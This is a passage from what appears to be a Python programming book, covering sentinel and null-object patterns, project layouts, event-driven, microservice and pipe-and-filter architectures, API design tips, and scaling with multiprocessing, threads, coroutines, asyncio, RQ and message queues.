This also makes the code more readable. You can have multiple types of sentinel objects denoting different error or failure situations, rather than a single generic None object. Admittedly, it might not be that simple to design a custom null object for cases where the object performs statistical or other calculations. Even so, the Python Standard Library makes use of this pattern; for example, the logging module implements a NullHandler that can be used when a handler is required but no actual logging should be done.
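With the NO_COMMANDER object from above assigned wherever None was used before, the earlier reporting loop collapses to the following sketch (reusing the book's hypothetical Soldier objects):

for sld in soldiers:
    # NO_COMMANDER responds to get_name() like any other Soldier,
    # so no special 'is None' check is required.
    print(sld.name, '-', sld.commander.get_name())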

Sentinel object patterns in Python

Finally, we discuss the Sentinel Pattern in Python. The built-in None object serves as the basic sentinel value for most of the use cases of basic datatypes. This should be sufficient for simple programs, where you can test the sentinel using the following:

if value is None:
    …

However, there are a couple of situations where one might look to something other than None to serve as the sentinel value. Take a look at the following:

First, let's say the user wants to use a data store where the None value has some significance. In that case, you indeed need a different sentinel value. Take the example of the lru_cache() decorator in the functools module of the Standard Library, which uses the sentinel pattern under the hood. Every instance of the cache creates a separate unique object within its closure:

# unique object used to signal cache misses
sentinel = object()

The interesting part is that using the cache_get method (an example of the Prebound Method pattern), you can now distinguish between two cases – the first, where an entry has been created in the cache and assigned the value None, and the second, where no entry has been created for the key at all. The usage would look like the following:

result = cache_get(key, sentinel)

if result is not sentinel:
    …

There are several such occurrences in the Standard Library of Python. Some of them include the following:

The lru_cache() method of the functools module.

The global _UNSET sentinel in the configparser module.

Secondly, the other use case that warrants custom sentinel values is when a function or method needs to verify whether an optional keyword argument has been supplied. The general practice is to set the default value to None. However, if there is a need to distinguish an explicitly supplied None from a missing argument, a sentinel object can be used, as sketched below. Regardless of where it is used, the fundamental idea of the Sentinel Object pattern is that it relies on the identity of the object, rather than its value, and that is how its significance is recognised by the surrounding code. If we use the equality (==) operator, we are only comparing sentinel values, as discussed earlier; sentinel objects, in contrast, are checked for their presence with the is operator.
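Here is a hedged sketch of that keyword-argument use case; the function and argument names are purely illustrative:

_MISSING = object()   # module-level sentinel, compared by identity

def update_profile(user, nickname=_MISSING):
    if nickname is _MISSING:
        print(f"{user}: nickname left untouched")
    elif nickname is None:
        print(f"{user}: nickname explicitly cleared")
    else:
        print(f"{user}: nickname set to {nickname}")

update_profile("alice")           # nickname left untouched
update_profile("alice", None)     # nickname explicitly cleared
update_profile("alice", "ace")    # nickname set to ace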

The simple principle is that when the functions return consistent values, bearing the same properties, then the end users can depend on the behavior and use them without explicit checks on their end. This enforces Polymorphism at the function level.

The influence of patterns over design

Like most concepts in software engineering, the pros and cons of design patterns depend entirely upon how they are implemented. Basic scripts or snippets can follow a simple approach and do just fine without considering any design patterns. Forcing the use of a design pattern is over-engineering – developers who do not understand adaptive and flexible software development are often prone to this. Contrary to popular belief, writing great software was never about predicting future requirements or edge cases. Rather, it is about solving the current problem in a manner that leaves room for change – the solution simply has to be flexible enough to be modified later. You cannot solve all the problems today.

Before creating a generic solution, remember the rule of three – when you encounter three or more instances of the same problem that need to be addressed, only then you can come up with a required abstraction; else, it is just over-engineering.

At this point, you should start thinking about the design patterns and their application, since you have pinpointed the problem as well as the pattern of occurrence and abstraction.

Design patterns are high-level ideas. The decision on how to use them varies from scenario to scenario and developer to developer. My personal approach to using design patterns is to start by coming up with a solution to solve the problem at hand by creating the appropriate abstractions, and then go on to verify if it can be modeled around some design patterns. If some pre-defined pattern fits the use case, it is wise to go ahead with an already proven and validated construct, thereby providing increased quality and confidence in the product.

Python application architecture

Python has a lot to say when it comes to style and syntax of code on how to make things idiomatic. However, when it comes to structuring the application code, it is relatively flexible. This flexibility can help decide on the specific architectures of the applications based on their use case, but can also confuse novice developers.

With great flexibility, also comes great opinions on how to do something well. In this section, we will be discussing some standard application designs that are conventionally accepted across several global applications. Some of them might have been pointed out briefly in the other parts of the book, but let us consolidate them in detail here.

Utility scripts

In a production environment, there are several instances when we need to do some pure automation work that might span just a single script. Such scripts need not be part of an extravagant application and should be good enough to be executed from the command line.

Now, generally, these scripts are accessed and maintained by multiple users, and hence it is imperative to include clear code and tests for the application.

The following structure is what is conventionally considered informative and robust for the command line applications:

application_name/
│
├── .gitignore
├── application_name.py
├── application_tests.py
├── setup.py
├── requirements.txt
├── README.md
└── LICENSE

Notice that everything has been placed in a single directory, with the application name being the same as the directory name.

With minimal files, you should now be able to create an app that can be tested, executed on the CLI, as well as packaged and distributed as an executable.

For those who are encountering these files for the first time, the specifications are as follows:

.gitignore – Lists the files and directories that should not be tracked by Git.
application_name.py – The main application script.
application_tests.py – The tests for the application code.
setup.py – The packaging and installation script used to distribute the application.
requirements.txt – The list of third-party dependencies to be installed with pip.
README.md – The description, usage, and installation notes for the project.
LICENSE – The legal terms under which the code is distributed.

Table 9.1: Common meta files in a Python Project

Deployable packages and libraries

Now, consider that your application has evolved into one that is more complex, and houses several sub-modules that come into play for enabling the functionality of the main application. More than that, you should have the flexibility to share, install, or deploy the application on multiple machines for the users. In such a case, the package can be structured in the following manner:

application_name/
│
├── bin/
├── docs/
│   ├── installation.md
│   └── how_to.md
├── application_name/
│   ├── __init__.py
│   ├── appname.py
│   └── helpers.py
│
├── module_one/
│   ├── __init__.py
│   ├── module_one.py
│   └── helpers.py
│
├── data/
│   ├── mock_inputs.csv
│   └── result.xlsx
│
├── tests/
│   ├── application_tests.py
│   └── test_helpers.py
│
├── .gitignore
├── setup.py
├── requirements.txt
├── README.md
└── LICENSE

In such applications, demarcating the functionality into different sub-directories creates unique namespaces that can be used to isolate the code and use it from anywhere.

Remember that these are simply conventional templates. If your specific use case warrants something drastically different, feel free to adapt them. Having a docs/ folder is, however, always encouraged.

Web application – Flask

Python is also increasingly popular in the web application sphere for the rapid prototyping of robust and secure web applications. Flask and Django are two of the most heavily used frameworks.

Flask, unlike Django, is a barebones framework for setting up lightweight web applications. The official Flask documentation outlines several suggestions for the layout of Flask projects. The main project directory of a Flask application would look something like the following:

flask_app/
│
├── flask_app/
│   ├── __init__.py
│   ├── db.py
│   ├── schema.sql
│   ├── auth.py
│   ├── blog.py
│   ├── templates/
│   │   ├── base.html
│   │   ├── auth/
│   │   │   ├── login.html
│   │   │   └── register.html
│   │   │
│   │   └── blog/
│   │       ├── index.html
│   │       └── display.html
│   │
│   └── static/
│       └── style.css
│
├── tests/
│   ├── data.sql
│   ├── test_db.py
│   ├── test_auth.py
│   └── test_blog.py
│
├── venv/
│
├── .gitignore
├── setup.py
└── MANIFEST.in

It is evident that even a Flask application is built similar to how we define Python libraries and modules. The tests and the virtualenvs are placed in the same project, yet outside the main application for the proper segregation of roles.

Web application – Django

Django has been around for a while, and a feature I have found fascinating from day one is that it generates a skeleton structure for the project by simply running an instantiation command:

django-admin startproject project_name

A project template will be created in the current working directory and will be named project_name.

The structure would look something like the following:

project_name/
│
├── project_name/
│   ├── __init__.py
│   ├── settings.py
│   ├── urls.py
│   └── wsgi.py
│
└── manage.py

Django apps can be considered as specialized versions of packages that can be imported and used elsewhere as well. To create an application, you simply go to the directory that contains the manage.py script and execute the following:

python manage.py startapp application_name

This will create the application directory within your project folder, containing scripts for the models, views, and tests as well. Thus, Django simply makes life easier by taking care of the bare-bones architecture of the project itself. For production Django applications, you are advised to take inspiration from the deployable package structure described earlier and add the additional parts to the structure created by Django.

Event driven programming architecture

Events are basically inputs that the program processes during execution – from user interactions to messages in a queue, or even sensor and hardware inputs. Event-driven programming refers to the separation of event-handler logic from the program's business logic. It is a programming paradigm and does not prescribe any particular syntax or notation. Depending upon the use case, event-driven programming can make your application more responsive and flexible, and can help improve throughput.

In this paradigm, we have separate function or methods called the event handlers that are triggered when an event is received. The event handlers are wired to process specific inputs like the incoming messages, keystrokes, data streams, or mouse movements. In Python, this makes use of an event loop that constantly keeps listening for any new events that come in.

Figure 9.1: Single threaded event loop

Contrast with concurrent programming

For everyone who comes from a parallel or concurrent programming background, the question that comes to mind is: how does this differ from the event-based programming we are discussing here? Even though event-based programs may be listening to multiple sources of events at the same time through their event handlers, they do not truly follow the parallel or concurrent programming paradigms. Event-based constructs usually work on a single thread of execution. Based on what kind of events are received, the event handlers are interleaved as sequential executions. The following charts depict the sequence of events in both types:

Figure 9.2: Parallel task execution with multithreading

Alternatively, if you consider event-driven programming constructs, the sequence of execution would look something as illustrated below:

Figure 9.3: Asynchronous task execution on a single thread

Thus, the tasks are executed in an interleaved manner. A slot is assigned to each task during the event loop, and only one of them executes at a time. When a task is done for now, control is passed back to the event loop and another task can take up the next slot, resulting in a form of cooperative multitasking.

Figure 9.4: Overview of event based systems architecture

The advantage of the event loop is that it operates in a non-blocking manner. This can sometimes lead to better performance than concurrent programs that contain blocking calls. Applications in the networking domain are a prime example: a thread-safe event loop is particularly useful there, since a single available network connection is used and information is processed only when it becomes available.
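As a minimal illustration of this single-threaded, non-blocking interleaving, consider the following sketch built on the standard asyncio event loop (the handler names are illustrative):

import asyncio

async def handle_event(name, delay):
    # awaiting hands control back to the event loop,
    # so other handlers get their slot in the meantime
    await asyncio.sleep(delay)
    print(f"processed event: {name}")

async def main():
    # both handlers are interleaved on a single thread
    await asyncio.gather(
        handle_event("keystroke", 0.2),
        handle_event("network message", 0.1),
    )

asyncio.run(main())
# processed event: network message
# processed event: keystroke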

Exploring concurrency with event loops

When solving a problem using only concurrency, the challenge is that there are several cases of memory management to deal with, as well as bugs to avoid when tasks encounter a blocking action. The idea to optimise the situation is to combine the best of both worlds – concurrency and events together. The Nginx server model demonstrates how an architecture like the following works:

Figure 9.5: Concurrency with event loops

The main event loop worker, for reasons of safety, takes up the processing of networking events and configuration in a single thread. However, any blocking operations, like file reads or HTTP request processing, are handed over to a thread pool that schedules and executes the tasks in parallel. Upon completion of a job, the result is handed back to the main event loop, where it is processed in a thread-safe manner.

This architecture combines the best of both worlds – the resilience of thread safety along with the benefits of concurrent or parallel executions – which not only utilizes the maximum CPU cores but also keeps the non-blocking event handling on an event loop with a single thread.
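In Python, a comparable split between an event loop and a worker pool can be sketched with asyncio and a thread pool; the file name here is purely illustrative:

import asyncio
from concurrent.futures import ThreadPoolExecutor

def blocking_read(path):
    # blocking I/O is kept off the event loop thread
    with open(path) as fh:
        return fh.read()

async def main():
    loop = asyncio.get_running_loop()
    with ThreadPoolExecutor() as pool:
        # the event loop schedules the blocking call on a worker thread
        data = await loop.run_in_executor(pool, blocking_read, "config.txt")
    # back on the event loop thread, process the result safely
    print(len(data), "bytes read")

asyncio.run(main())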

We will be getting more insights into this paradigm in the section on scaling Python applications, later in the chapter.

Microservices architecture

The microservices architecture is all about building a relatively complex application as a combination of several smaller interactive services that run independently and communicate with each other with the help of lighter mechanisms like the HTTP protocol. You can deploy the smaller services independently and scale them as needed, without relying on a ton of configuration. The microservices are considered to derive their inspiration from the Service Oriented Architectures paradigm, which specifies that an application should be developed as a collection of dynamic, mutually interacting services that operate independently, rather than a monolithic application which is built top-down.

The older means of building the monolithic applications typically have the following components:

The frontend or the UI used by the clients built using the web technologies, typically JavaScript and HTML/CSS.

The business logic residing on a server.

Data storage in the form of structured databases to persist data for the short and long term.

To design a similar solution using the microservices architecture, the different components are further split into different services.

For example, the business logic residing on the server can be implemented in the form of multiple interacting services and they lie at different levels in the flow of control for the application.

Similarly, the data stored in the databases can be divided into multiple different data storages, depending upon the use, size, or the schematics of the data. For microservices, since the communication between the components is quite frequent, the messages are typically JSON objects.

The following illustrates how a monolithic application differs from a microservice application on an architectural level:

Figure 9.6: Monolithic vs microservice architectures

Frameworks supporting microservices in Python

Microservices are more of a design philosophy. It is difficult to think of a framework that would adhere only to this philosophy. However, there are some properties that any framework should possess in order to be a viable option for building microservice-based applications:

Flexible architecture

Lightweight core components

Minimalistic configurations

Code refactor and reuse

Keeping these principles in mind, if we explore the Python software treasury, we find some web frameworks that facilitate the development of microservices, and some that do not:


Table 9.2: Frameworks that favour Microservices

On the other hand, a framework like Django is not a very appropriate choice for a microservices-based application. It enforces very tight vertical component integration, does not offer the flexibility required for choosing components, and has rigid configuration, among other traits. These make it an easy-to-use framework, but not a viable option for microservices.

Why choose microservices?

There are several benefits of using microservices where applicable, compared to monolithic applications. The highlights include the following:

Better separation of concerns: Microservices split the business logic of the application into separate, well-defined units of service. Hence, cohesion is improved and the coupling between components decreases.

Reduced initial design: You do not have to build the complete design upfront for the application. The design and architecture of the microservices can be easily refactored in an iterative fashion.

Well tested applications: Microservices facilitate better testing, since the components are smaller and isolated and can be individually verified for their functionalities.

Organisational structure improvements: For firms that use large and complex microservice structures, the teams can be created and managed around the microservices – and that would encourage specialization in a particular component as well as facilitate cross-functional roles. Such organisations are more agile in nature.

Decentralization of data: Unlike monolithic applications, every microservice can have its own data and underlying storage, rather than relying on a centrally located database.

Reliable CI/CD pipelines: With microservices, changes happen component wise and are easy to test as well. This can help achieve shorter automated release cycles and relatively fast deployments.

Pipe and filter architecture

The Pipe and Filter architecture is a simple technique to understand and implement, inspired by the UNIX shell's ability to redirect the output of one command as the input of the next using the pipe separator. The pipes connect consecutive nodes that act as filters for the data streams. For example, the number of words in a file can be retrieved by this sequence of commands in UNIX:

$ cat filename | wc -w

The gstreamer multimedia processing library that supports various operations on audio and video files is a good example of how this architecture can be visualized. In Python, the multiprocessing module provides support for pipes as a means of communicating between different processes.

Pipes are basically parent and child connection pairs. Whatever is passed on at one end of the communication can be viewed at the other end and vice-versa.

This is especially useful in the data science space, where custom ETL processes generally run as sequential steps, and designing such a model is quite simple with this architecture in mind. This architecture finds common usage in data analytics, transformation of data, extraction of meta-information, and so on.

There can be multiple data sources, which are then connected to the filter nodes with the help of pipes. The filters are designed to house small isolated units of work that perform a specific operation on the data, and the results from one filter may be passed on as inputs to the next. The final processed data is then sent to a Data Sink for persistent storage.

Figure 9.7: Pipe and Filter Architecture

For confined and smaller applications, the filter nodes can reside on the same machine – in which case the communication between the nodes happens with the help of shared memory buffers or actual UNIX pipes. In larger, resource-intensive systems, the filters might need to reside on separate machines or cloud containers – in which case the communication can take place through any kind of data channel, including shared memory, sockets, or event queues. You can connect multiple filters to each other for performing complex data processing and staging.

Let us take the following simple example to see how the multiprocessing module implements the pipe and filter architecture:

import sys
from multiprocessing import Process, Pipe

def read_file(fname, connection):
    """ Read from file and send to the connection """
    connection.send(open(fname).read())

def count_words(connection):
    """ Count and print number of words in the connection data """
    available_words = connection.recv()
    print('Available Words', len(available_words.split()))

if __name__ == "__main__":
    parent_proc, child_proc = Pipe()

    # Create and Start Process 1
    proc_one = Process(
        target=read_file,
        args=(sys.argv[1], child_proc)
    )
    proc_one.start()

    # Create and Start Process 2
    proc_two = Process(
        target=count_words,
        args=(parent_proc,)
    )
    proc_two.start()

    # Complete the processes
    proc_one.join()
    proc_two.join()

When executed, this snippet will count the words in the file that is being read. The steps taken illustrate how the pipe and filter architecture is being used here:

A pipe is created, yielding the two connection objects.

The file read is the first filter, which runs as a separate process; it takes the file name as input and sends the read data to its connection.

The word count operation is the second filter, and is executed as a different process. This filter takes in the data read from the connection and counts the number of words before printing to the console.

In the preceding example, we set up an explicit connection to play the part of the pipe. However, this may not always be needed. In Python, generator objects can be chained so that each consumes and processes the previous one's data, thereby creating a data processing pipeline.

If we were to implement the example we used for multiprocessing earlier, but this time using generators (let’s add an additional filter to select files with a particular extension only), it would look like the following:

# Generator pipeline to filter files based on a type
# and count words in them.
import os

def filter_files(all_files, file_extension):
    """ Filter the files stream to yield only some files """
    for item in all_files:
        if item.endswith(file_extension):
            yield item

def read_files(filenames):
    """ Yields (filename, data) for every file """
    for fname in filenames:
        yield fname, open(fname).read()

def count_words(fdata):
    """ Yields number of words in the stream data """
    for fname, data in fdata:
        yield fname, len(data.split())

if __name__ == "__main__":
    # Chain the generators
    stream_one = filter_files(os.listdir('./'), '.py')
    stream_two = read_files(stream_one)
    stream_three = count_words(stream_two)

    for data in stream_three:
        print(data)

If I execute the preceding code, the following is returned:

$ python3 test.py
('test.py', 292)
('descriptors.py', 154)

Building simple or complex data processing pipelines is made possible by the chaining of generators (or co-routines), which connects the input and output of the generators consecutively.

Apart from these, there are several other techniques like connecting producer-consumer tasks using queues, by processes or threads to achieve the same pipelines. We might have seen examples of these in other relevant chapters of the book. You can also use Microservices for creating the simple data processing pipelines by redirecting the output of one to the input of another.
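A minimal sketch of the queue-based producer-consumer variant, using only the standard queue and threading modules (the file name here is just an example):

import queue
import threading

def produce_lines(fname, out_q):
    """ First filter: push lines from a file onto the queue """
    with open(fname) as fp:
        for line in fp:
            out_q.put(line)
    out_q.put(None)   # Sentinel to signal the end of the stream

def consume_and_count(in_q):
    """ Second filter: count words arriving on the queue """
    total = 0
    while True:
        line = in_q.get()
        if line is None:
            break
        total += len(line.split())
    print('Available Words', total)

if __name__ == "__main__":
    pipe_q = queue.Queue()
    producer = threading.Thread(target=produce_lines, args=('test.py', pipe_q))
    consumer = threading.Thread(target=consume_and_count, args=(pipe_q,))
    producer.start()
    consumer.start()
    producer.join()
    consumer.join()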

There are several third-party frameworks and packages in Python, that can be used to build data pipelines of varying complexity:

Although Celery is a task queuing mechanism, simple batch processing workflows can be created with limited support for setting up pipelines. It can chain up different tasks that can emulate a pipeline for a similar implementation.

Luigi can be used for setting up complex, long-running data processing batches that adhere to the pipe and filter architecture. It is bundled with Hadoop support that can also help scale up your data analysis pipelines.

API design pointers

For most young developers, as soon as a problem statement is handed over, it is difficult to control the urge to start writing code. Once a design is in place, our fingers, almost uncontrollably, want to start hammering the keyboard and turn our ideas into code.

Remember that other developers will have to use the APIs we design. In this section, we will be looking at some of the design tips we have gathered over the years. You can apply them to any category of APIs, be it libraries, SDKs, modules, and even automation scripts:

Be explicit with API design: Make your APIs do exactly what they say. If a function is named as though it simply returns a user's name as a string, it should do just that – it should not be expected to increment counters or update databases on the side. Using immutable data structures is also a great idea.

Give choice to the user: The usage of the API would differ from user to user. Some may want to pass arguments as lists, some as dictionaries, or simple strings. Some users may want synchronous while others may want async operations. Wherever possible, make your API versatile and allow users more options to adapt their use case.

However, too much choice can be paralysing for the user. Provide sensible defaults instead. Balancing the right amount of choice with focused functionality is paramount:
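As a hypothetical sketch of this balance, an API function can accept either a single value or an iterable and keep sensible defaults for the common case (the function and field names here are illustrative):

def fetch_records(ids, as_dict=True):
    """ Accept a single id or any iterable of ids;
        the sensible default returns dictionaries. """
    if isinstance(ids, (int, str)):
        ids = [ids]                           # A single value is also accepted
    records = [{'id': item} for item in ids]  # Placeholder lookup
    return records if as_dict else [(r['id'],) for r in records]

fetch_records(42)                          # Simple call relying on defaults
fetch_records([1, 2, 3], as_dict=False)    # More control when needed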

Boilerplate code is bad: Whatever can be inferred and handled in the code should be taken care of automatically. The user should not be burdened with providing every small detail. Avoiding boilerplate code keeps the API code clean and terse.

Minimize dependencies of the API: Self-contained code is the best code. There is always a balance to strike between writing re-usable code and tight coupling. It is better to split complicated functionality into smaller independent APIs.

Define meaningful error states: Having well defined error codes to return at an application level helps to debug situations better. Imagine asking your API to get_name() and getting back an unexplained failure – it provides no information. Having error codes like AppError.NO_RECORD_FOUND or AppError.DB_NOT_REACHABLE helps to debug the issue way faster (a small sketch follows at the end of this list).

Document, Document, Document: Yes, as enthusiastic as we are about writing the code, we are equally lazy about documenting it. It is boring, but essential. Great documentation takes some time, effort, and sanity. From the high-level overview to message protocols, sample code, and return values, they are all required as part of documenting your API. Adequate and focused documentation is an asset.

Write tests for sane APIs: Tests prove that APIs are working correctly. They are especially helpful while refactoring your APIs in the future, making sure that you do not break existing functionality for the users who are already relying on your API. Documentation cannot capture all the essence of the API, and tests help cover the ground there. If documentation is the user manual for the API, tests are like the instruction set architecture reference.

The design of your API matters. For people who like to simply hack things around, it encourages them to step back and look at the bigger picture. Even though all of these steps seem time consuming and tedious, in the end you will be a happier soul.
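Returning to the pointer on meaningful error states, a minimal sketch of application-level error codes modelled with an enum (the AppError names mirror the examples above, and the lookup logic is hypothetical):

from enum import Enum

class AppError(Enum):
    NO_RECORD_FOUND = 'No matching record was found'
    DB_NOT_REACHABLE = 'The database could not be reached'

def get_name(user_id, records):
    """ Return (name, error) so that callers can act on a specific failure. """
    if user_id not in records:
        return None, AppError.NO_RECORD_FOUND
    return records[user_id], None

name, err = get_name(42, {})
if err is AppError.NO_RECORD_FOUND:
    print('Lookup failed:', err.value)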

Scaling Python applications

Applications that process huge amounts of data can, over time, start to lag or perform sluggishly. If not addressed, this risks corrupting or breaking your test or production setup. Scaling applications is a way to keep up with growing workloads, and there are several ways in which we can make our Python applications scale, which we will touch upon in this section.

Asynchronous programming in Python

Asynchronous programming refers to the main application thread outsourcing smaller units of work to run separately. Upon completion of the delegated task, the main thread is notified about the success or failure status of the thread running the sub-task. This technique enhances the responsiveness and performance of the application, as it does not have to wait idly for something to be done:

Figure 9.8: Synchronous vs Asynchronous programming

The focus and traction around the usage of asynchronous techniques in recent years is attributable to their efficiency, despite being more complex than traditional sequential execution programs.

Say, for example, your application is making some HTTP requests externally – the usual behaviour is to wait for the response and proceed with the next steps. If you choose to use asynchronous coroutines, the request can be submitted and the main thread can continue with other tasks while the response is awaited.

The primary reason why the Node.js tool gained popularity for the server side programming is the use of asynchronous constructs. Several high-throughput and IO intensive applications have external dependencies, like databases, REST endpoints, or file systems; hence, much of the code needs to handle sending requests and receiving responses. When any such resource is interacted with, the program execution simply waits around for the job to be done. If you use asynchronous programming, the code will now have the liberty to proceed with the other tasks, instead of waiting for the task to be completed.

Figure 9.9: Programming Models

Multiprocessing

The naïve way is to simply run multiple processes manually and let the system take care of scheduling resources like the CPU cores. However, to automate large-scale tasks to run as multiple separate processes, the multiprocessing module helps with spawning and management. The following is a simple example of the usage of this library:

from multiprocessing import Process

def print_model(model='City'):
    print('Processing Honda Model: ', model)

if __name__ == "__main__":
    model_names = ['Civic', 'Jazz', 'Brio']
    procs_list = []

    # Process using the default argument
    process = Process(target=print_model)
    procs_list.append(process)
    process.start()

    for model in model_names:
        process = Process(
            target=print_model,
            args=(model,)
        )
        procs_list.append(process)
        process.start()

    for process in procs_list:
        process.join()

The result from running the preceding code would be like the following:

$ python ~/test.py
('Processing Honda Model: ', 'City')
('Processing Honda Model: ', 'Civic')
('Processing Honda Model: ', 'Jazz')
('Processing Honda Model: ', 'Brio')

Multithreading

Next up is multithreading – running multiple tasks at a single time on different threads. A thread, like a process, is a line of execution – the difference being that several threads can be spawned in a single process context and they share common resources. Hence, writing code that uses threading is considerably more challenging. The OS does most of the tuning about sharing the CPU cores when it comes to working with threads. However, you must remember the GIL (Global Interpreter Lock) in Python that restricts Python threads from running on multiple cores simultaneously. Therefore, multi-threading in CPython is simply going to run the threads on the same core and share their execution time slots.

Using the threading module in Python, the following example illustrates a simple implementation of multi-threading:

import math
import threading as td

def get_square(value):
    print("Square of input: {}".format(value * value))

def get_sqrt(value):
    print("Square root of input: {}".format(math.sqrt(value)))

if __name__ == "__main__":
    thrd1 = td.Thread(target=get_sqrt, args=(100,))
    thrd2 = td.Thread(target=get_square, args=(10,))

    # Trigger first thread
    thrd1.start()
    # Trigger second thread
    thrd2.start()

    # Await execution of first thread
    thrd1.join()
    # Await execution of second thread
    thrd2.join()

    print("Done!")

The preceding code results in the following sequence of execution:

Square root of input: 10.0
Square of input: 100
Done!

Coroutines using yield

Fundamentally, a coroutine is nothing but a generalization of the well-known subroutines. It is a mechanism of cooperative multitasking, in which the process can relinquish control, at certain points or during idle cycles, to a different section of the program, enabling multiple application components to run simultaneously.

Coroutines are built around generators, with some additional methods and slight modifications around how the yield statement is used. Generators can help in iterating over datasets; however, coroutines can also consume data.

Generators produce data for iterations. Coroutines can consume data as well.

The following is an example of a simple multi-tasking operation with the help of coroutines:

def print_model(model):
    print("Honda is launching models: {}".format(model))
    try:
        while True:
            # Using yield to create coroutines
            car_model = (yield)
            if model in car_model:
                print(car_model)
    except GeneratorExit:
        print("Terminating Coroutine!!")

coroutines = print_model("Civic")
coroutines.__next__()
coroutines.send("Civic CVT 1.5D")
coroutines.send("Civic Turbo")
coroutines.send("Mobilio")
coroutines.close()

The result of the preceding code upon execution would be as follows:

Honda is launching models: Civic
Civic CVT 1.5D
Civic Turbo
Terminating Coroutine!!

The asyncio module in Python

The other method of simultaneous execution is asynchronous programming, which takes the Operating System out of the picture. From that perspective, we will have a single process with a single thread, but we will still be able to achieve multiple tasks at once. So, what is happening under the hood? Asyncio is the answer here.

Since Python 3.4, the dedicated asyncio module has been available; it is designed to make asynchronous code simpler to write and understand, with the help of futures, event loops, and coroutines. It does not work with callbacks the way its counterparts in other languages do.


To simply explain, the usage of the code can be structured by defining your individual tasks in the form of coroutines, and then you can schedule them as per convenience (which can even be simultaneously). Within the coroutines are defined the yield points, where a context switch can occur when there are other tasks to cover. Nothing happens if there are no other tasks left.

When we talk about context switches in asyncio, it refers to the event loop transferring the flow of control from one coroutine to another.
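As a minimal illustration (assuming Python 3.7+ for asyncio.run), the two coroutines below hand control back to the event loop at their await points, so their output interleaves:

import asyncio

async def worker(name, delay):
    # Each await is a potential context switch point for the event loop
    print("{} started".format(name))
    await asyncio.sleep(delay)
    print("{} finished after {}s".format(name, delay))

async def main():
    # Schedule both coroutines; the event loop interleaves their execution
    await asyncio.gather(worker("task-one", 2), worker("task-two", 1))

asyncio.run(main())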

Let us see this in action with the help of an example. We have defined three tasks that run asynchronously, fetching the information on the top five entries from Reddit feeds, extracting the JSON data and writing it to the console. We will be making use of aiohttp, which is a library that ensures that HTTP requests are handled in an asynchronous fashion.

import aiohttp
import asyncio
import json
import signal
import sys

BASE_URL = 'https://www.reddit.com/r/{}/top.json?sort=top&t=day&limit=5'

event_loop = asyncio.get_event_loop()
clnt_session = aiohttp.ClientSession(loop=event_loop)

async def retrieve_json(client, url):
    async with client.get(url) as resp:
        assert resp.status == 200
        return await resp.read()

async def get_feed_data(feed_topic, client):
    fetched_data = await retrieve_json(
        client, BASE_URL.format(feed_topic))
    json_data = json.loads(fetched_data.decode('utf-8'))
    for fieldInfo in json_data['data']['children']:
        link = fieldInfo['data']['url']
        title = fieldInfo['data']['title']
        score = fieldInfo['data']['score']
        print("{}: {} ({})".format(str(score), title, link))
    print('COMPLETED PROCESSING FOR: {} \n'.format(feed_topic))

def handle_signal(signal, frame):
    event_loop.stop()
    clnt_session.close()
    sys.exit(0)

# Configure the trigger signal
signal.signal(signal.SIGINT, handle_signal)

asyncio.ensure_future(get_feed_data('rust', clnt_session))
asyncio.ensure_future(get_feed_data('flask', clnt_session))
asyncio.ensure_future(get_feed_data('einstein', clnt_session))

event_loop.run_forever()

Distributed processing using Redis Queue (RQ)

This is an alternative technique for the oldies out there. If you or your organisation are still working with older versions of Python, then using asyncio and aiohttp may not always be a viable option. Even in the case of systems where you would want to run your tasks across different machines, the simple out-of-the-box Python tools may not suffice. In all such scenarios, we fall back to using something like RQ (Redis Queue). It is a simple solution in Python that is used for maintaining job queues and then processing them using multiple workers in the background. Note that this library is built on top of the Redis in-memory database for key/value storage.

Again, let us see the usage of this with the help of a basic function we have defined using Redis:

####### word_processor.py #######
import requests

def get_word_count(remote_url):
    """ Basic Function Implementation """
    response = requests.get(remote_url)
    # Compute the number of words
    num_words = len(response.text.split())
    print(num_words)
    return num_words

####### main.py #######
from word_processor import get_word_count
from redis import Redis
from rq import Queue

my_queue = Queue(connection=Redis())
job = my_queue.enqueue(get_word_count,
                       'http://www.rajthoughts.com')
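The enqueued job is only executed once an RQ worker is running against the same Redis instance; a minimal sketch of how this is usually wired up:

# In a separate shell, start a worker that picks jobs off the default queue
#   $ rq worker

# Back in Python, the result becomes available once a worker has run the job
import time
time.sleep(2)        # Give the worker a moment to process the job
print(job.result)    # The word count returned by get_word_count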

Scaling Python web applications – message and task queues

Up until now, we have been discussing scaling up – that is, how we improve scalability within the confines of the host server or a single machine. Most of the practical, real world applications that you work on day-to-day are built to run across machines, i.e. they scale out with increasing users, load, or capacity. This is how scalability is tackled for most web applications. There are several techniques deployed in order to scale an application out – including designing specific communications and workflows, creating redundancy for failovers, scaling horizontally, scaling compute resources, or making use of different protocols. However, unless you are designing products from scratch, these areas are quite a lengthy discussion to be had – which is beyond the scope of this book. Here, we will be talking about the most useful, popular ways of scaling production workflows – message queues and task queues.

Reducing coupling between systems helps to scale them well. Keeping the two systems tightly coupled does not allow them to scale beyond a certain limit.

Say, for example, you cram all your data and business logic into one single function – it would be quite difficult for you to leverage the full power of the available resources like multiple CPU cores. It has been observed that if you restructure the same program using one of the asynchronous techniques discussed earlier, and use a queue to pass messages, it indeed scales well.

The web application systems can also be scaled well if you can decouple them. The REST APIs are examples of one such scalable architecture, where the HTTP servers and endpoints can be scaled across multiple regions and data centers across the globe.

The purpose of the message queue is to decouple the communication between the different dependent applications by being a broker for the messages. They make use of Queueing Protocols to communicate, despite residing on different host servers.

A message queue is a larger version of the multi-threaded synchronized queue, where the threads are replaced by individual machines, and the in-process queue is replaced by a distributed shared queue.

The sender and receiver applications communicate by writing and reading chunks of data onto the queue, known as messages. Some of the common message queues come with their own storage and communication semantics, where the message is persisted in the queue until the receiver application reads and processes it. A schematic model of the components and communications in a message queue would look something like the following:

Figure 9.10: Schematic model of a distributed message queue

A common standard of message queues, also referred to as Message-Oriented Middleware, is AMQP or the Advanced Message Queueing Protocol, which ensures that the attributes of such a system are guaranteed – including queueing, security, routing of messages, and reliable message delivery.

The financial industry has been the originator and primary propagator of AMQP, given that security of information and reliable delivery of data are of paramount importance there. Several AMQP implementations exist in the open source software world. RabbitMQ, Apache Qpid, and ZeroMQ are some such implementations.

RabbitMQ is quite popular at the time of writing of this book – it is a middleware written in Erlang. It supports APIs and adapters in several languages, including Python. RabbitMQ's message delivery is facilitated with the help of exchanges, and routing keys are used to identify the unique queues for delivering the messages. In the following section, we will be looking into a more specialized middleware in Python – Celery – a flexible and distributed queue system that is highly focused on real time production applications.
